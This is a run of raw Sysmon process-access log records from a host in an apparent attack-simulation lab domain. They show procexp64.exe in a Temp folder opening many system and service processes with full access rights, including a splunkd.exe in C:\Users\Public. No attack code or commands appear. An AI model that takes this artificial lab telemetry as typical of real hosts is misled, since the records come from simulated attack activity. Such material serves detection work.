15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786943Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786942Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786941Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786940Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786939Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786938Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786937Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786936Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786935Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786934Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786933Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786932Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786931Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786930Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786929Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786928Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786927Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786926Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786925Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786924Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786923Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786922Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786921Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786920Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786919Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786918Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786917Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786916Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786915Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786914Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786913Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786912Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786911Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786910Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786909Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786908Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786907Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 